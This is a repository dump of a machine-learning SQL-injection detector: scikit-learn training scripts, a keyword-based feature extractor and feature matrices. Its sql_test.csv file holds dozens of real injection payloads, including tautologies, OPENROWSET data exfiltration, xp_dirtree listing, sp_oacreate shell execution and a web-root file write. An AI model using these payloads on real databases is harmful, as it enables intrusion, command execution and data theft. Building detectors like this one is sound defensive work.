19 | t%3D1498533566250%26rst%3Dswf%2Cimg%26ct%3Dd%26cs%3D2074%26td%3D%26s%3D310736%26v%3D710297211%26u%3D1154411548%26k%3D%E5%86%9B%E5%B8%88%E8%81%94%E7%9B%9F%7C%26paid%3D1%26tt%3D%E5%A4%A7%E5%86%9B%E5%B8%88%E5%8F%B8%E9%A9%AC%E6%87%BF%E4%B9%8B%E5%86%9B%E5%B8%88%E8%81%94%E7%9B%9F%2B10%26pu%3Dhttp%3A//v.youku.com/v_show/id_XMjg0MTE4ODg0NA%3D%3D.html%3Ffrom%3Dy1.2-2.2%26ref%3Dhttp%3A//v.youku.com/v_show/id_XMjg0MTExNDMwNA%3D%3D.html%3Fspm%3Da2h0j.8191423.item_XMjg0MTExNDMwNA%3D%3D.A%26sid%3D1bjjov5pb2l1k%26p%3D323%26_%3D%3E%3E
20 | type%3DgetUserSetCarIcon%26carId%3D460018499102909%26direction%3D%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%26carIconType%3D0
21 |
--------------------------------------------------------------------------------
/ML_for_SQL/data/nortest_matrix.csv:
--------------------------------------------------------------------------------
1 | 17.000000,0.000000,0.058824,0.823529,0.000000,0.000000,0.058824,0.000000
2 | 81.000000,0.000000,0.061728,0.493827,0.000000,0.000000,0.086420,0.000000
3 | 38.000000,0.000000,0.052632,0.605263,0.000000,0.000000,0.078947,0.000000
4 | 495.000000,0.000000,0.367677,0.202020,0.000000,0.000000,0.018182,0.000000
5 | 18.000000,0.000000,0.055556,0.833333,0.000000,0.000000,0.055556,0.000000
6 | 12.000000,0.000000,0.083333,0.750000,0.000000,0.000000,0.083333,0.000000
7 | 22.000000,0.000000,0.318182,0.590909,0.000000,0.000000,0.090909,0.000000
8 | 318.000000,0.000000,0.075472,0.415094,0.000000,0.000000,0.106918,0.000000
9 | 108.000000,0.000000,0.083333,0.583333,0.000000,0.000000,0.083333,0.000000
10 | 35.000000,0.000000,0.057143,0.657143,0.000000,0.000000,0.085714,0.000000
11 | 48.000000,0.000000,0.083333,0.375000,0.000000,0.000000,0.083333,0.000000
12 | 94.000000,0.000000,0.265957,0.563830,0.000000,0.000000,0.106383,0.000000
13 | 39.000000,0.000000,0.025641,0.230769,0.000000,0.000000,0.025641,0.000000
14 | 33.000000,0.000000,0.151515,0.515152,0.000000,0.000000,0.090909,0.000000
15 | 591.000000,0.000000,0.115059,0.407783,0.000000,0.003384,0.101523,0.000000
16 | 273.000000,0.000000,0.073260,0.479853,0.000000,0.000000,0.128205,0.000000
17 | 964.000000,0.000000,0.060166,0.409751,0.000000,0.000000,0.099585,0.000000
18 | 358.000000,0.000000,0.083799,0.550279,0.002793,0.000000,0.106145,0.000000
19 | 524.000000,0.000000,0.188931,0.356870,0.000000,0.000000,0.177481,0.000000
20 | 119.000000,0.000000,0.294118,0.218487,0.000000,0.000000,0.159664,0.000000
21 |
--------------------------------------------------------------------------------
/ML_for_SQL/data/sql_test.csv:
--------------------------------------------------------------------------------
1 | ; and 1=1 and 1=22.admin adminuser user pass password ..
2 | and 0<>(select count(*) from *)
3 | group by users.id having 1=1--
4 | group by users.id, users.username, users.password, users.privs having 1=1--
5 | ; insert into users values( 666, attacker, foobar, 0xffff )--
6 | UNION Select TOP 1 COLUMN_blank>_NAME FROM INFORMATION_blank>_SCHEMA.COLUMNS Where TABLE_blank>_NAME=logintable-
7 | and user_blank>_name()=dbo--
8 | and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U)
9 | ;exec master.dbo.sp_blank>_password null,jiaoniang$,1866574;--
10 | :a or name like fff%;-- ffff。
11 | and 1<>(select count(email) from [user]);--
12 | ;update [users] set email=(select top 1 name from sysobjects where xtype=u and status>0) where name=ffff;--
13 | id=152 and exists(select * from aaa where aaa>5)
14 | insert into OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select * from table1) select * from table2
15 | table2_blank>table1。IP
16 | insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table2) select * from database..table2
17 | HASH_blank>hashsysxlogins。
18 | insert into OPENROWSET(SQLOLEDB, uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _blank>_sysxlogins)
19 | 1and 1=(Select IS_blank>_SRVROLEMEMBER(sysadmin));--
20 | ;insert dirs exec master.dbo.xp_blank>_dirtree c:\--
21 | and 0<>(select top 1 paths from dirs)--
22 | and 0<>(select top 1 paths from dirs where paths not in(@Inetpub))--
23 | ;create table dirs1(paths varchar(100), id int)--
24 | ;insert dirs exec master.dbo.xp_blank>_dirtree e:\web--
25 | and 0<>(select top 1 paths from dirs1)--
26 | and 1=(Select top 1 name from(Select top 12 id,name from sysobjects where xtype=char(85)) T order by id desc)
27 | and 1=(Select Top 1 col_blank>_name(object_blank>_id(USER_blank>_LOGIN),1) from sysobjects) 。
28 | and 1=(select user_blank>_id from USER_blank>_LOGIN)
29 | and 0=(select user from USER_blank>_LOGIN where user>1)
30 | exec sp_blank>_oacreate wscript.shell, @o out
31 | exec sp_blank>_oamethod @o, run, NULL, notepad.exe
32 | ; declare @o int exec sp_blank>_oacreate wscript.shell, @o out exec sp_blank>_oamethod @o, run, NULL, notepad.exe--
33 | declare @o int, @f int, @t int, @ret int
34 | declare @line varchar(8000)
35 | exec sp_blank>_oacreate scripting.filesystemobject, @o out
36 | exec sp_blank>_oamethod @o, opentextfile, @f out, c:\boot.ini, 1
37 | exec @ret = sp_blank>_oamethod @f, readline, @line out
38 | exec sp_blank>_oacreate scripting.filesystemobject, @o out
39 | exec sp_blank>_oamethod @o, createtextfile, @f out, c:\inetpub\wwwroot\foo.asp, 1
40 | exec @ret = sp_blank>_oamethod @f, writeline, NULL,
41 | exec sp_blank>_oacreate speech.voicetext, @o out
42 | exec sp_blank>_oamethod @o, register, NULL, foo, bar
43 | exec sp_blank>_oasetproperty @o, speed, 150
44 | exec sp_blank>_oamethod @o, speak, NULL, all your sequel servers are belong to,us, 528waitfor delay 00:00:05
45 | ; declare @o int, @ret int exec sp_blank>_oacreate speech.voicetext, @o out exec sp_blank>_oamethod @o, register, NULL, foo, bar exec sp_blank>_oasetproperty @o, speed, 150 exec sp_blank>_oamethod @o, speak, NULL, all your sequel servers are belong to us, 528 waitfor delay 00:00:05--
46 | 1+and+1=1
47 | ');waitFor+Delay+'00:00:05'
48 | ') or '1'='1--
49 | OR 1=1
50 | WHERE 1=1 AND 1=1
51 | ORDER BY 1--
52 | RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='
53 |
54 |
--------------------------------------------------------------------------------
/ML_for_SQL/data/sqltest_matrix.csv:
--------------------------------------------------------------------------------
1 | 56.000000,0.000000,0.000000,0.089286,0.160714,0.035714,0.000000,1.000000
2 | 31.000000,0.000000,0.000000,0.032258,0.129032,0.000000,0.000000,1.000000
3 | 30.000000,0.000000,0.000000,0.066667,0.133333,0.033333,0.000000,1.000000
4 | 75.000000,0.000000,0.000000,0.026667,0.093333,0.013333,0.000000,1.000000
5 | 61.000000,0.000000,0.000000,0.065574,0.147541,0.000000,0.000000,1.000000
6 | 112.000000,0.000000,0.508929,0.008929,0.071429,0.008929,0.000000,1.000000
7 | 28.000000,0.000000,0.000000,0.000000,0.035714,0.035714,0.000000,1.000000
8 | 64.000000,0.000000,0.015625,0.031250,0.125000,0.015625,0.000000,1.000000
9 | 62.000000,0.000000,0.000000,0.112903,0.032258,0.000000,0.000000,1.000000
10 | 29.000000,0.000000,0.000000,0.000000,0.172414,0.000000,0.034483,1.000000
11 | 43.000000,0.000000,0.000000,0.023256,0.093023,0.023256,0.000000,1.000000
12 | 107.000000,0.000000,0.000000,0.018692,0.130841,0.037383,0.000000,1.000000
13 | 48.000000,0.000000,0.000000,0.083333,0.145833,0.020833,0.000000,1.000000
14 | 109.000000,0.000000,0.165138,0.045872,0.100917,0.027523,0.000000,1.000000
15 | 22.000000,0.000000,0.090909,0.090909,0.000000,0.000000,0.000000,1.000000
16 | 142.000000,0.000000,0.197183,0.119718,0.063380,0.028169,0.000000,1.000000
17 | 26.000000,0.000000,0.153846,0.000000,0.000000,0.000000,0.000000,1.000000
18 | 124.000000,0.000000,0.225806,0.120968,0.048387,0.032258,0.000000,1.000000
19 | 52.000000,0.000000,0.307692,0.038462,0.038462,0.019231,0.000000,1.000000
20 | 52.000000,0.000000,0.000000,0.000000,0.076923,0.000000,0.000000,1.000000
21 | 39.000000,0.000000,0.000000,0.051282,0.153846,0.000000,0.000000,1.000000
22 | 68.000000,0.000000,0.014706,0.029412,0.147059,0.000000,0.000000,1.000000
23 | 49.000000,0.000000,0.000000,0.081633,0.102041,0.000000,0.000000,1.000000
24 | 55.000000,0.000000,0.000000,0.000000,0.072727,0.000000,0.000000,1.000000
25 | 40.000000,0.000000,0.000000,0.075000,0.150000,0.000000,0.000000,1.000000
26 | 109.000000,0.000000,0.027523,0.055046,0.155963,0.018349,0.000000,1.000000
27 | 93.000000,0.000000,0.118280,0.032258,0.075269,0.010753,0.000000,1.000000
28 | 52.000000,0.000000,0.173077,0.019231,0.076923,0.019231,0.000000,1.000000
29 | 55.000000,0.000000,0.163636,0.036364,0.109091,0.018182,0.000000,1.000000
30 | 45.000000,0.000000,0.000000,0.000000,0.088889,0.000000,0.000000,1.000000
31 | 50.000000,0.000000,0.080000,0.000000,0.100000,0.000000,0.000000,1.000000
32 | 115.000000,0.000000,0.034783,0.000000,0.121739,0.000000,0.000000,1.000000
33 | 40.000000,0.000000,0.000000,0.000000,0.200000,0.000000,0.000000,1.000000
34 | 27.000000,0.000000,0.000000,0.148148,0.074074,0.000000,0.000000,1.000000
35 | 58.000000,0.000000,0.000000,0.000000,0.068966,0.000000,0.000000,1.000000
36 | 64.000000,0.000000,0.000000,0.015625,0.109375,0.000000,0.000000,1.000000
37 | 54.000000,0.000000,0.000000,0.000000,0.129630,0.018519,0.000000,1.000000
38 | 58.000000,0.000000,0.000000,0.000000,0.068966,0.000000,0.000000,1.000000
39 | 81.000000,0.000000,0.000000,0.012346,0.086420,0.000000,0.000000,1.000000
40 | 51.000000,0.000000,0.078431,0.000000,0.117647,0.019608,0.000000,1.000000
41 | 48.000000,0.000000,0.000000,0.000000,0.083333,0.000000,0.000000,1.000000
42 | 52.000000,0.000000,0.076923,0.000000,0.115385,0.000000,0.000000,1.000000
43 | 43.000000,0.000000,0.000000,0.069767,0.093023,0.000000,0.000000,1.000000
44 | 108.000000,0.000000,0.037037,0.083333,0.129630,0.000000,0.000000,1.000000
45 | 284.000000,0.000000,0.028169,0.042254,0.137324,0.000000,0.000000,1.000000
46 | 9.000000,0.000000,0.000000,0.333333,0.000000,0.111111,0.000000,1.000000
47 | 27.000000,0.000000,0.074074,0.222222,0.000000,0.000000,0.000000,1.000000
48 | 14.000000,0.000000,0.000000,0.142857,0.142857,0.071429,0.000000,1.000000
49 | 6.000000,0.000000,0.333333,0.333333,0.166667,0.166667,0.000000,1.000000
50 | 17.000000,0.000000,0.470588,0.235294,0.176471,0.117647,0.000000,1.000000
51 | 12.000000,0.000000,0.583333,0.083333,0.166667,0.000000,0.000000,1.000000
52 | 83.000000,0.000000,0.409639,0.240964,0.132530,0.024096,0.000000,1.000000
53 | 0.000000,0.000000,0.409639,0.240964,0.132530,0.024096,0.000000,1.000000
54 |
--------------------------------------------------------------------------------
/ML_for_SQL/featurepossess.py:
--------------------------------------------------------------------------------
1 | # -*- coding: UTF-8 -*-
2 | import re
3 |
4 | def generate(odir,wdir,label):
5 | f_input=open(wdir, 'w')
6 | with open(odir, 'rb') as f:
7 | data = [x.decode('utf-8').strip() for x in f.readlines()]
8 | #print(data)
9 | line_number=0
10 |
11 | for line in data:
12 | global feature
13 | num_len=0
14 | capital_len=0
15 | key_num=0
16 | feature3=0
17 | line_number=line_number+1
18 | num_len=len(re.compile(r'\d').findall(line))
19 | if len(line)!=0:
20 | num_f=num_len/len(line)#数字字符频率
21 | capital_len=len(re.compile(r'[A-Z]').findall(line))
22 | if len(line)!=0:
23 | capital_f=capital_len/len(line)#大写字母频率
24 | line=line.lower()
25 |
26 | key_num=line.count('and%20')+line.count('or%20')+line.count('xor%20')+line.count('sysobjects%20')+line.count('version%20')+line.count('substr%20')+line.count('len%20')+line.count('substring%20')+line.count('exists%20')
27 | key_num=key_num+line.count('mid%20')+line.count('asc%20')+line.count('inner join%20')+line.count('xp_cmdshell%20')+line.count('version%20')+line.count('exec%20')+line.count('having%20')+line.count('unnion%20')+line.count('order%20')+line.count('information schema')
28 | key_num=key_num+line.count('load_file%20')+line.count('load data infile%20')+line.count('into outfile%20')+line.count('into dumpfile%20')
29 | if len(line)!=0:
30 | space_f=(line.count(" ")+line.count("%20"))/len(line)#空格百分比
31 | special_f=(line.count("{")*2+line.count('28%')*2+line.count('NULL')+line.count('[')+line.count('=')+line.count('?'))/len(line)
32 | prefix_f=(line.count('\\x')+line.count('&')+line.count('\\u')+line.count('%'))/len(line)
33 | #print('%f,%f,%f,%f,%f,%f,%f,%f' % (len(line),key_num,capital_f,num_f,space_f,special_f,prefix_f,label))
34 |
35 | f_input.write('%f,%f,%f,%f,%f,%f,%f,%f' % (len(line),key_num,capital_f,num_f,space_f,special_f,prefix_f,label)+'\n')
36 |
37 | f_input.close()
38 | return wdir
39 |
--------------------------------------------------------------------------------
/ML_for_SQL/file/Adaboost.model:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/flywangfang258/ML-for-SQL-Injection/c7f013d1b67a9af8b48f4e6c0fa7e1ad1c35d82f/ML_for_SQL/file/Adaboost.model
--------------------------------------------------------------------------------
/ML_for_SQL/file/GBDT.model:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/flywangfang258/ML-for-SQL-Injection/c7f013d1b67a9af8b48f4e6c0fa7e1ad1c35d82f/ML_for_SQL/file/GBDT.model
--------------------------------------------------------------------------------
/ML_for_SQL/file/bys.model:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/flywangfang258/ML-for-SQL-Injection/c7f013d1b67a9af8b48f4e6c0fa7e1ad1c35d82f/ML_for_SQL/file/bys.model
--------------------------------------------------------------------------------
/ML_for_SQL/file/forestrandom.model:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/flywangfang258/ML-for-SQL-Injection/c7f013d1b67a9af8b48f4e6c0fa7e1ad1c35d82f/ML_for_SQL/file/forestrandom.model
--------------------------------------------------------------------------------
/ML_for_SQL/file/knn.model:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/flywangfang258/ML-for-SQL-Injection/c7f013d1b67a9af8b48f4e6c0fa7e1ad1c35d82f/ML_for_SQL/file/knn.model
--------------------------------------------------------------------------------
/ML_for_SQL/file/lg.model:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/flywangfang258/ML-for-SQL-Injection/c7f013d1b67a9af8b48f4e6c0fa7e1ad1c35d82f/ML_for_SQL/file/lg.model
--------------------------------------------------------------------------------
/ML_for_SQL/file/svm.model:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/flywangfang258/ML-for-SQL-Injection/c7f013d1b67a9af8b48f4e6c0fa7e1ad1c35d82f/ML_for_SQL/file/svm.model
--------------------------------------------------------------------------------
/ML_for_SQL/file/tree.model:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/flywangfang258/ML-for-SQL-Injection/c7f013d1b67a9af8b48f4e6c0fa7e1ad1c35d82f/ML_for_SQL/file/tree.model
--------------------------------------------------------------------------------
/ML_for_SQL/sqlbys.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | """
3 | Created on Mon Nov 20 19:06:57 2017
4 |
5 | @author: wf
6 | """
7 | import numpy as np
8 | import pandas as pd
9 | from sklearn import metrics
10 | from sklearn.naive_bayes import GaussianNB
11 | from sklearn.model_selection import train_test_split
12 | from featurepossess import generate
13 | from sklearn.externals import joblib
14 |
15 | sql_matrix=generate("./data/sqlnew.csv","./data/sql_matrix.csv",1)
16 | nor_matrix=generate("./data/normal_less.csv","./data/nor_matrix.csv",0)
17 |
18 | df = pd.read_csv(sql_matrix)
19 | df.to_csv("./data/all_matrix.csv",encoding="utf_8_sig",index=False)
20 | df = pd.read_csv( nor_matrix)
21 | df.to_csv("./data/all_matrix.csv",encoding="utf_8_sig",index=False, header=False, mode='a+')
22 |
23 | feature_max = pd.read_csv('./data/all_matrix.csv')
24 | arr=feature_max.values
25 | data = np.delete(arr, -1, axis=1) #删除最后一列
26 | #print(arr)
27 | target=arr[:,7]
28 | #随机划分训练集和测试集
29 | train_data,test_data,train_target,test_target = train_test_split(data,target,test_size=0.3,random_state=3)
30 | #模型
31 | clf=GaussianNB()#创建分类器对象,
32 | clf.fit(train_data,train_target)#训练模型
33 | joblib.dump(clf, './file/bys.model')
34 | print("forestrandom.model has been saved to 'file/bys.model'")
35 | #clf = joblib.load('svm.model')
36 | y_pred=clf.predict(test_data)#预测
37 | print("y_pred:%s"%y_pred)
38 | print("test_target:%s"%test_target)
39 | #Verify
40 | print('Precision:%.3f' %metrics.precision_score(y_true=test_target,y_pred=y_pred))#查全率
41 | print('Recall:%.3f' %metrics.recall_score(y_true=test_target,y_pred=y_pred))#查准率
42 | print(metrics.confusion_matrix(y_true=test_target,y_pred=y_pred))#混淆矩阵
43 |
44 |
45 |
46 |
--------------------------------------------------------------------------------
/ML_for_SQL/sqlforestrandom.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | """
3 | Created on Mon Nov 20 19:06:57 2017
4 |
5 | @author: wf
6 | """
7 | import numpy as np
8 | import pandas as pd
9 | import matplotlib.pyplot as plt
10 | from sklearn import metrics
11 | from sklearn.ensemble import RandomForestClassifier
12 | from sklearn.model_selection import train_test_split
13 | from featurepossess import generate
14 | from sklearn.externals import joblib
15 |
16 | sql_matrix=generate("./data/sqlnew.csv","./data/sql_matrix.csv",1)
17 | nor_matrix=generate("./data/normal_less.csv","./data/nor_matrix.csv",0)
18 |
19 | df = pd.read_csv(sql_matrix)
20 | df.to_csv("./data/all_matrix.csv",encoding="utf_8_sig",index=False)
21 | df = pd.read_csv( nor_matrix)
22 | df.to_csv("./data/all_matrix.csv",encoding="utf_8_sig",index=False, header=False, mode='a+')
23 |
24 | feature_max = pd.read_csv('./data/all_matrix.csv')
25 | arr=feature_max.values
26 | data = np.delete(arr, -1, axis=1) #删除最后一列
27 | #print(arr)
28 | target=arr[:,7]
29 | #随机划分训练集和测试集
30 | train_data,test_data,train_target,test_target = train_test_split(data,target,test_size=0.3,random_state=3)
31 | #模型
32 | clf = RandomForestClassifier(n_estimators=10,max_depth=2)#创建分类器对象,
33 | clf.fit(train_data,train_target)#训练模型
34 | joblib.dump(clf, './file/forestrandom.model')
35 | print("forestrandom.model has been saved to 'file/forestrandom.model'")
36 | #clf = joblib.load('svm.model')
37 | y_pred=clf.predict(test_data)#预测
38 | print("y_pred:%s"%y_pred)
39 | print("test_target:%s"%test_target)
40 | #Verify
41 | print('Precision:%.3f' %metrics.precision_score(y_true=test_target,y_pred=y_pred))#查全率
42 | print('Recall:%.3f' %metrics.recall_score(y_true=test_target,y_pred=y_pred))#查准率
43 | print(metrics.confusion_matrix(y_true=test_target,y_pred=y_pred))#混淆矩阵
44 |
45 |
46 |
47 |
--------------------------------------------------------------------------------
/ML_for_SQL/sqlkNN.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | """
3 | Created on Mon Nov 20 19:06:57 2017
4 |
5 | @author: wf
6 | """
7 | import numpy as np
8 | import pandas as pd
9 | import matplotlib.pyplot as plt
10 | from sklearn import metrics
11 | from sklearn import neighbors
12 | from sklearn.model_selection import train_test_split
13 | from featurepossess import generate
14 | from sklearn.externals import joblib
15 |
16 | sql_matrix=generate("./data/sqlnew.csv","./data/sql_matrix.csv",1)
17 | nor_matrix=generate("./data/normal_less.csv","./data/nor_matrix.csv",0)
18 |
19 | df = pd.read_csv(sql_matrix)
20 | df.to_csv("./data/all_matrix.csv",encoding="utf_8_sig",index=False)
21 | df = pd.read_csv( nor_matrix)
22 | df.to_csv("./data/all_matrix.csv",encoding="utf_8_sig",index=False, header=False, mode='a+')
23 |
24 | feature_max = pd.read_csv('./data/all_matrix.csv')
25 | arr=feature_max.values
26 | data = np.delete(arr, -1, axis=1) #删除最后一列
27 | #print(arr)
28 | target=arr[:,7]
29 | #随机划分训练集和测试集
30 | train_data,test_data,train_target,test_target = train_test_split(data,target,test_size=0.3,random_state=3)
31 | #模型
32 | clf=neighbors.KNeighborsClassifier(algorithm='ball_tree')#创建分类器对象,
33 | clf.fit(train_data,train_target)#训练模型
34 | joblib.dump(clf, './file/knn.model')
35 | print("forestrandom.model has been saved to 'file/knn.model'")
36 | #clf = joblib.load('svm.model')
37 | y_pred=clf.predict(test_data)#预测
38 | print("y_pred:%s"%y_pred)
39 | print("test_target:%s"%test_target)
40 | #Verify
41 | print('Precision:%.3f' %metrics.precision_score(y_true=test_target,y_pred=y_pred))#查全率
42 | print('Recall:%.3f' %metrics.recall_score(y_true=test_target,y_pred=y_pred))#查准率
43 | print(metrics.confusion_matrix(y_true=test_target,y_pred=y_pred))#混淆矩阵
44 |
45 |
46 |
47 |
--------------------------------------------------------------------------------
/ML_for_SQL/sqllogistic.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | """
3 | Created on Mon Nov 20 19:06:57 2017
4 |
5 | @author: wf
6 | """
7 | import numpy as np
8 | import pandas as pd
9 | from sklearn import metrics
10 | from sklearn.linear_model import LogisticRegression
11 | from sklearn.model_selection import train_test_split
12 | from featurepossess import generate
13 | from sklearn.externals import joblib
14 |
15 | sql_matrix=generate("./data/sqlnew.csv","./data/sql_matrix.csv",1)
16 | nor_matrix=generate("./data/normal_less.csv","./data/nor_matrix.csv",0)
17 |
18 | df = pd.read_csv(sql_matrix)
19 | df.to_csv("./data/all_matrix.csv",encoding="utf_8_sig",index=False)
20 | df = pd.read_csv( nor_matrix)
21 | df.to_csv("./data/all_matrix.csv",encoding="utf_8_sig",index=False, header=False, mode='a+')
22 |
23 | feature_max = pd.read_csv('./data/all_matrix.csv')
24 | arr=feature_max.values
25 | data = np.delete(arr, -1, axis=1) #删除最后一列
26 | #print(arr)
27 | target=arr[:,7]
28 | #随机划分训练集和测试集
29 | train_data,test_data,train_target,test_target = train_test_split(data,target,test_size=0.3,random_state=3)
30 | #模型
31 | clf=LogisticRegression()#创建分类器对象,
32 | clf.fit(train_data,train_target)#训练模型
33 | joblib.dump(clf, './file/lg.model')
34 | print("forestrandom.model has been saved to 'file/lg.model'")
35 | #clf = joblib.load('svm.model')
36 | y_pred=clf.predict(test_data)#预测
37 | print("y_pred:%s"%y_pred)
38 | print("test_target:%s"%test_target)
39 | #Verify
40 | print('Precision:%.3f' %metrics.precision_score(y_true=test_target,y_pred=y_pred))#查全率
41 | print('Recall:%.3f' %metrics.recall_score(y_true=test_target,y_pred=y_pred))#查准率
42 | print(metrics.confusion_matrix(y_true=test_target,y_pred=y_pred))#混淆矩阵
43 |
44 |
45 |
46 |
--------------------------------------------------------------------------------
/ML_for_SQL/sqlsvm.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | """
3 | Created on Mon Oct 30 20:00:50 2017
4 |
5 | @author: wf
6 | """
7 | import numpy as np
8 | import pandas as pd
9 | import matplotlib.pyplot as plt
10 | from sklearn import metrics
11 | from sklearn.svm import SVC
12 | from sklearn.model_selection import train_test_split
13 | from featurepossess import generate
14 | from sklearn.externals import joblib
15 |
16 | sql_matrix=generate("./data/sqlnew.csv","./data/sql_matrix.csv",1)
17 | nor_matrix=generate("./data/normal_less.csv","./data/nor_matrix.csv",0)
18 |
19 | df = pd.read_csv(sql_matrix)
20 | df.to_csv("./data/all_matrix.csv",encoding="utf_8_sig",index=False)
21 | df = pd.read_csv( nor_matrix)
22 | df.to_csv("./data/all_matrix.csv",encoding="utf_8_sig",index=False, header=False, mode='a+')
23 |
24 | # with open('sql_matrix', 'ab') as f:
25 | # f.write(open('nor_matrix', 'rb').read())
26 | feature_max = pd.read_csv('./data/all_matrix.csv')
27 | arr=feature_max.values
28 | data = np.delete(arr, -1, axis=1) #删除最后一列
29 | #print(arr)
30 | target=arr[:,7]
31 | #随机划分训练集和测试集
32 | train_data,test_data,train_target,test_target = train_test_split(data,target,test_size=0.3,random_state=8)
33 | clf = SVC(kernel='rbf')#创建分类器对象,采用概率估计,默认为False
34 | clf.fit(train_data, train_target)#用训练数据拟合分类器模型
35 | joblib.dump(clf, './file/svm.model')
36 | print("svm.model has been saved to 'file/svm.model'")
37 | #clf = joblib.load('svm.model')
38 | y_pred=clf.predict(test_data)#预测
39 | print("y_pred:%s"%y_pred)
40 | print("test_target:%s"%test_target)
41 | #Verify
42 | print('Precision:%.3f' %metrics.precision_score(y_true=test_target,y_pred=y_pred))#查全率
43 | print('Recall:%.3f' %metrics.recall_score(y_true=test_target,y_pred=y_pred))#查准率
44 | print(metrics.confusion_matrix(y_true=test_target,y_pred=y_pred))#混淆矩阵
45 | #print('F1:%.3f' %metrics.f1_score(y_true=test_target,y_pred=y_pred))#F1度量
46 | #fpr,tpr,thresholds=metrics.roc_curve(y_true=test_target,y_score=y_pred)
47 | #print(fpr,tpr,thresholds)
48 | #print('auc:%.3f' %metrics.auc(fpr,tpr))
49 | #print('auc:%.3f' %metrics.roc_auc_score(y_true=test_target,y_score=y_pred))
50 | #plt.figure(1)
51 | #plt.axis([0,1,0,1])#设置横轴纵轴最大坐标
52 | #plt.plot([0,1],[0,1],'k--')#绘制对角线曲线
53 | #plt.plot(fpr,tpr,label='ROCcurve')#有问题,只有3个点
54 | #plt.xlabel('False positive rate')#x轴标签
55 | #plt.ylabel('True positive rate')#y轴标签
56 | #plt.title('ROC curve')
57 | #plt.legend(loc='best')#生成图例
58 | #plt.show()#显示图形
59 |
--------------------------------------------------------------------------------
/ML_for_SQL/sqltree.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | """
3 | Created on Tue Nov 7 14:40:05 2017
4 |
5 | @author: wf
6 | """
7 | import numpy as np
8 | import pandas as pd
9 | import matplotlib.pyplot as plt
10 | from sklearn import metrics
11 | from sklearn import tree
12 | from sklearn.model_selection import train_test_split
13 | from featurepossess import generate
14 | from sklearn.externals import joblib
15 |
16 | sql_matrix=generate("./data/sqlnew.csv","./data/sql_matrix.csv",1)
17 | nor_matrix=generate("./data/normal_less.csv","./data/nor_matrix.csv",0)
18 |
19 | df = pd.read_csv(sql_matrix)
20 | df.to_csv("./data/all_matrix.csv",encoding="utf_8_sig",index=False)
21 | df = pd.read_csv( nor_matrix)
22 | df.to_csv("./data/all_matrix.csv",encoding="utf_8_sig",index=False, header=False, mode='a+')
23 |
24 | # with open('sql_matrix', 'ab') as f:
25 | # f.write(open('nor_matrix', 'rb').read())
26 | feature_max = pd.read_csv('./data/all_matrix.csv')
27 | arr=feature_max.values
28 | data = np.delete(arr, -1, axis=1) #删除最后一列
29 | #print(arr)
30 | target=arr[:,7]
31 | #随机划分训练集和测试集
32 | train_data,test_data,train_target,test_target = train_test_split(data,target,test_size=0.3,random_state=3)
33 | #模型
34 | clf=tree.DecisionTreeClassifier(criterion="entropy",max_depth=1)
35 | clf.fit(train_data,train_target)#训练模型
36 | joblib.dump(clf, './file/tree.model')
37 | print("tree.model has been saved to 'file/tree.model'")
38 | #clf = joblib.load('svm.model')
39 | y_pred=clf.predict(test_data)#预测
40 | print("y_pred:%s"%y_pred)
41 | print("test_target:%s"%test_target)
42 | #Verify
43 | print('Precision:%.3f' %metrics.precision_score(y_true=test_target,y_pred=y_pred))#查全率
44 | print('Recall:%.3f' %metrics.recall_score(y_true=test_target,y_pred=y_pred))#查准率
45 | print(metrics.confusion_matrix(y_true=test_target,y_pred=y_pred))#混淆矩阵
46 |
47 |
--------------------------------------------------------------------------------
/ML_for_SQL/testsql.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | """
3 | Created on Mon Oct 30 20:00:50 2017
4 |
5 | @author: wf
6 | """
7 | import numpy as np
8 | import pandas as pd
9 | import matplotlib.pyplot as plt
10 | from sklearn import metrics
11 | from sklearn.svm import SVC
12 | from sklearn.model_selection import train_test_split
13 | from featurepossess import generate
14 | from sklearn.externals import joblib
15 |
16 | def test_c(flag,sql_flag):
17 | sql_dir = "./data/sql_test.csv"
18 | nor_dir = "./data/normal_test.csv"
19 | allm_dir = "./data/alltest_matrix.csv"
20 | if flag=='1' and sql_flag=='0':
21 | nor_matrix = generate(nor_dir, "./data/nor_matrix.csv", 0)
22 | return nor_matrix
23 | elif flag=='1' and sql_flag=='1':
24 | sql_matrix = generate(sql_dir, "./data/sqltest_matrix.csv", 1)
25 | return sql_matrix
26 | else:
27 | sql_matrix=generate(sql_dir,"./data/sqltest_matrix.csv",1)
28 | nor_matrix=generate(nor_dir,"./data/nortest_matrix.csv",0)
29 | df = pd.read_csv(sql_matrix)
30 | df.to_csv(allm_dir,encoding="utf_8_sig",index=False)
31 | df = pd.read_csv( nor_matrix)
32 | df.to_csv(allm_dir,encoding="utf_8_sig",index=False, header=False, mode='a+')
33 | return allm_dir
34 | def test_data(allm_dir):
35 | feature_max = pd.read_csv(allm_dir)
36 | arr=feature_max.values
37 | test_data = np.delete(arr, -1, axis=1) #删除最后一列
38 | #print(arr)
39 | test_target=arr[:,7]
40 | return test_data,test_target
41 |
42 | if __name__=="__main__":
43 | while(1):
44 | model_name=input("请输入要选择的模型名称:")
45 | clf = joblib.load('./file/'+model_name)
46 | print(model_name," has been loaded")
47 | flag=input("请输入测试文件个数:")
48 | sql_flag=input("请输入样本类型:")
